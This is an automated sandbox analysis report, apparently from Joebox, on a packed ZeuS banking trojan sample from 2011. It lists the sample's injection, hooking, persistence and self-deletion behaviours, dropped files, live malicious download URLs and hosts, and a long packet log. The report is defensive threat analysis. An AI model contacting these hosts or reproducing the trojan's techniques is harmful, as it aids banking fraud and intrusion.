
Joebox - Abstract Analysis File 10064
+ General information
Joebox version: 4.5.0
Start time: 15:11:40
Start date: 01/12/2011
Overall analysis duration: 0h 8m 49s
Target binary file name: ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe
Target script file name: default.jbs
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Errors:
  • Too many NtWriteVirtualMemory calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
  • Too many NtReadVirtualMemory calls (excessive behavior)
+ Classification / Thread Score
Persistence, Installation Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:
+ Signature Detections
  • Creates files inside the user directory
  • Creates temporary files
  • Executes batch files
  • Printf formatting strings found in memory and binary data
  • Queries a list of all running processes
  • Spawns processes
  • URLs found in memory or binary data
  • Binary may include packed or crypted data
  • Creates an autostart registry key
  • Deletes itself after installation
  • Downloads files from webservers via HTTP
  • Entrypoint lies outside standard sections
  • Found strings which match known social media URLs
  • PE file contains sections with non-standard names
  • Performs DNS lookups
  • Posts data to webserver
  • Allocates memory in foreign processes
  • Creates a thread in another existing process (thread injection)
  • Disables the phishing filter of Internet Explorer 8
  • Found strings which match known bank URLs
  • Hooks clipboard functions (used to sniff clipboard data)
  • Hooks files or directories query functions (used to hide files and directories)
  • Hooks Winsock functions (used for sniffing or altering network traffic)
  • Infects existing html files
  • Injects a PE file into a foreign process
  • Modifies the prolog of usermode functions (usermode inline hooks)
  • Writes to foreign memory regions
Static File Information
+ General Information
File name: ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe
File size: 171520 bytes
MD5: fb65104ccd2ca664496234d3f2c2a371
SHA1: c647ffda8cf6bf08936f8b5fe51fba8f5cc76c00
SHA256: e6b30ad8647860a5711d96e34478a715b89dc9c9a3d1e24608dbf4affcb001a5
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+ PE Information
+ General
Entrypoint: 0x441570 (in section UPX1)
Imagebase: 0x400000
Time stamp: 0x4ED69E59 [Wed Nov 30 21:21:29 2011 UTC]
Subsystem: windows gui
TLS callbacks:
+ Resources
Name | RVA address | Size | Type
Russian | 0x42194 | 0x10a8 | data
Russian | 0x43240 | 0x8a8 | data
Russian | 0x43aec | 0x14 | MS Windows icon resource - 1 icon
Russian | 0x43b04 | 0x14 | MS Windows icon resource - 1 icon
Russian | 0x43b1c | 0x35c | data
English | 0x43e7c | 0x15a | ASCII text, with CRLF line terminators
+ Imports
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
GDI32.dll | SetMapMode
ole32.dll | CoInitialize
OLEAUT32.dll | (no named imports)
USER32.dll | GetDC
+ Exports
+ Sections
Name | Virtual address | Virtual size | Raw size | Entropy
UPX0 | 0x1000 | 0x19000 | 0x0 | 0.0
UPX1 | 0x1a000 | 0x28000 | 0x27800 | 7.941156889
.rsrc | 0x42000 | 0x3000 | 0x2200 | 5.84145342324
+ Version Infos
Description | Data
FileVersion | 7.2.1.5
InternalName | WinCG
ProductVersion | 7.2.1.5
LegalCopyright | Copyright (C) 2010 Andre Schulz
FileDescription | Windows CryptContext Generator (WinCG)
CompanyName | This is Free Software under the terms of the GNU GPL v2
ProductName | CryptContext Generator
OriginalFilename | WinCG
Translation | 0x0409 0x04b0
+ Possible Origin
Language of compilation system | Country where language is spoken | Map
Russian | Russia |
English | United States |
String Analysis
+ Formattings for printf style functions
String value | Source
%SystemRoot%\System32\mswsock.dll | cmd.exe
del /F "%s" | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
o/]{:v%s1qgxd6 | hianh.exe.dr
%02d%s%02d%s%02d | cmd.exe
|%SystemRoot%\system32\rsvpsp.dll | hianh.exe, ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%2d%s%02d%s%02d%s%02d | cmd.exe
CMD Internal Error %s | cmd.exe
%C1[r0 | hianh.exe.dr
%02d%s%02d%s | cmd.exe
del "%s" | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
`tA%C]o | hianh.exe.dr
"%s" %s | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%USERPROFILE%\Appl | hianh.exe
/c "%s" | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
V@2%Pp` | profi[1].bin.dr
%s%08x.%s | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%s %s | cmd.exe
%f0,@]FN,: | hianh.exe.dr
?8%O@) | profi[1].bin.dr
if exist "%s" goto d | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
(%s) %s | cmd.exe
%s%08x | ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
ache%OLK* | cmd.exe
%SystemRoot%\system32\rsvpsp.dll | hianh.exe, ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%s %s%s | cmd.exe
%SystemRoot%\System32\winrnr.dll | hianh.exe, ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%SystemRoot%\system32\mswsock.dll | cmd.exe
+ URLs
String value | Source
http://baygleefacfif.nightmail.ru/profi.bin | explorer.exe
http://digitalid.verisign.com | explorer.exe
http://sexsecret.com/store/includes/ext/red.php | explorer.exe
http://www.google.com/ig%3fhl%3den%26source%3diglk&usg=afqjcnfa18xpfgb7dknxfkz7x7g1gdh1tg | webhp[1].txt.dr
http://www.google.com/logos/2011/thanksgiving.html# | webhp[1].txt.dr
http://www.google.com/webhp | explorer.exe, ctfmon.exe, wscntfy.exe
http://www.google.com/webhp%3fcplp%3d | webhp[1].txt.dr
http://www.google.cz/ | webhp[1].txt.dr
http://www.infobeat.com | explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=3doutlookexpress&pve= | explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=cert | explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=home | explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=hotmail | explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=infobeat | explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=verisign | explorer.exe
https://accounts.google.com/servicelogin?continue | webhp[1].txt.dr
https://plus.google.com/116899029375914044550 | webhp[1].txt.dr
https://plusone.google.com/u/0 | webhp[1].txt.dr
https://ssl.gstatic.com/gb/js/abc/gcm_e9b1c8ddbdbba9ea5c035548a0320af1.js | webhp[1].txt.dr
https://ssl.gstatic.com/gb/js/abc/pwm_4e7edac1f189ab82bc4091ff7bfe6f4b.js | webhp[1].txt.dr
+ Social media names
String value | Source
/Hotmail.gif equals www.hotmail.com (Hotmail) | explorer.exe
<img src="res://msoeres.dll/Hotmail.gif"><br> equals www.hotmail.com (Hotmail) | explorer.exe
<img src=3D"res://msoeres.dll/Hotmail.gif"><br> equals www.hotmail.com (Hotmail) | explorer.exe
Get a free Hotmail account! equals www.hotmail.com (Hotmail) | explorer.exe
Get a free Hotmail account!</a> Then read your mail from any place on = equals www.hotmail.com (Hotmail) | explorer.exe
Get a free Hotmail account!</a> Then read your mail from any place on earth. equals www.hotmail.com (Hotmail) | explorer.exe
Ses://msoeres.dll/Hotmail.gif equals www.hotmail.com (Hotmail) | explorer.exe
res://msoeres.dll/Hotmail.gif equals www.hotmail.com (Hotmail) | explorer.exe
+ Bank names
String value | Source
WINTRUST.dll equals www.wintrust.com (Wintrust Financial Corporation) | explorer.exe
Analysis Overview
+ Startup
  • system is xp
  • cleanup
+ Dropped Files
File Path | MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat | 5DFCFFC250A5C85ADFE0FB447849B784
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat | C02B0BD696B8B40794F2F04646760B1C
C:\Documents and Settings\Administrator\Application Data\887021879.log | 22F9E2D5502451ACE279D693DE6EF609
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe | 0FA8C6FF6A0816FF75416A307F79FC7A
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei | C67AD2CC1A4C840B94811B24D1F6DA25
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin | 63388EB2E8D078EEFD47945E4B3C7AA0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm | 7A285EC8EF4E3C212344DADC6A7ACF4B
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt | E656B36A17F6B1FE13E003111D518BE8
+ Involved Domains
Name | IP | Name Server | ASN | ASN Description | ASN State | Registrar | e-Mail
sexsecret.com | 184.168.213.44 | ns25.domaincontrol.com, ns26.domaincontrol.com | AS26496 | PAH-INC - GoDaddy.com, Inc. | US | GODADDY.COM, INC. | sales@alexander-institute.com
www.google.com | 74.125.39.99 | | AS15169 | GOOGLE - Google Inc. | US | unknown | unknown
baygleefacfif.nightmail.ru | 194.186.88.59 | | AS3216 | SOVAM-AS OJSC _Vimpelcom_ | RU | unknown | unknown
+ Involved IP Addresses
IP | ASN | ASN Description | ASN State
195.186.1.121 | AS44038 | BLUEWIN-AS Swisscom (Schweiz) AG | CH
Global Network Data
+ All TCP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 15:18:18.185386896 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.185460091 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.185791969 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.188780069 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.188810110 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.532304049 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.597053051 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.597300053 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.597332954 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.616430998 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.616625071 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.616648912 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.623820066 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.624083042 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.624104977 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.624844074 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.643755913 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662195921 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662462950 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.662492037 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662504911 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662684917 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.662699938 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.676281929 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.676573038 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.676597118 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.676601887 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.702502012 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.702723980 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.702749014 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.724565029 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.724845886 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.724874020 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.725063086 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.725862980 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.728842974 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.729105949 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.729124069 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.753705978 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.754018068 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.754077911 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.754534960 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.754776955 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.781233072 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.781281948 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.781650066 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.781743050 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.800118923 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.800126076 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.800529003 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.800621986 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.853334904 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.853657007 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.853780985 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.853847980 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.854109049 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.854214907 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.871515036 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.873306990 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.873703957 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.873761892 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.874011993 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.879692078 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.879698992 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.880093098 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.917557001 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.922044992 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.922441006 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.922494888 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.922535896 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.923877001 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.924262047 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.924279928 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.924666882 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.946041107 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.960292101 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.960685968 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.960747004 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.960782051 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.967232943 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.967962027 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.967999935 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.985457897 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.985894918 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.985954046 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.050123930 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.050568104 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.050632954 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.050648928 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.050909996 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.058980942 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.058988094 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.059389114 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.062752008 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.062758923 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.063211918 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.066415071 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.070019007 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.070401907 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.070442915 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.070786953 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.076375961 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.090068102 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.090459108 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.090511084 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.090851068 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.092531919 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.092540979 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.092946053 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.104554892 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.104794979 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.104844093 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.104851007 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.104991913 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.107372046 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.107378960 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.107578993 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.130284071 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.142271042 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.142508030 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.142566919 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.142744064 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.143069029 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.170778990 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.170950890 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.170974970 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.179817915 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.179986954 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.180010080 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.209239006 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.209760904 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.211258888 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.211275101 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:47.665731907 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.665787935 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.666131020 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.668677092 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.668699026 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.939644098 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.998624086 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.998997927 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.999017954 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.999022961 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.999383926 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.079001904 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.079427004 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.079441071 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.079694033 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.103765965 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.103780031 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.104218006 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.104348898 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.104361057 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.118968964 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.119349957 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.119362116 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.119643927 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.130254984 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.130264997 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.130661011 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.130774975 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.130784035 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.142738104 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.143119097 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.143131018 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.143229008 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.156383038 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.156769037 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.156788111 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.157043934 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.157329082 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.157337904 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.157712936 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.160973072 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.161344051 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.161360979 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.161612034 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.163208008 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.169120073 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.169497967 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.169511080 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.169763088 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.175570965 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.183777094 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.184149027 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.184165001 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.184422016 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.187108994 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.187117100 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.187326908 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.187526941 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.187832117 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.187840939 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.188153982 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.203917027 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.213342905 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.213673115 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.214199066 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.214211941 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.434768915 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:48.434792042 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:48.435053110 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:48.438009024 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:48.438020945 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:49.280440092 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:49.451913118 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:49.451929092 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:49.514885902 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:49.514899015 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:50.054022074 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:50.216964960 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:50.216979980 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:50.436232090 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:19:05.079654932 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:19:05.080070972 CET 1081 80 192.168.0.10 184.168.213.44
+ All UDP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 15:18:17.575004101 CET 59202 53 192.168.0.10 195.186.1.121
Dec 1, 2011 15:18:17.929677010 CET 53 59202 195.186.1.121 192.168.0.10
Dec 1, 2011 15:18:47.494621038 CET 56090 53 192.168.0.10 195.186.1.121
Dec 1, 2011 15:18:47.639733076 CET 53 56090 195.186.1.121 192.168.0.10
Dec 1, 2011 15:18:48.225858927 CET 53530 53 192.168.0.10 195.186.1.121
Dec 1, 2011 15:18:48.430505037 CET 53 53530 195.186.1.121 192.168.0.10
+ DNS Query
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 1, 2011 15:18:17.575004101 CET | 192.168.0.10 | 195.186.1.121 | 0x17ee | Standard query (0) | baygleefacfif.nightmail.ru | A (IP address) | IN (0x0001)
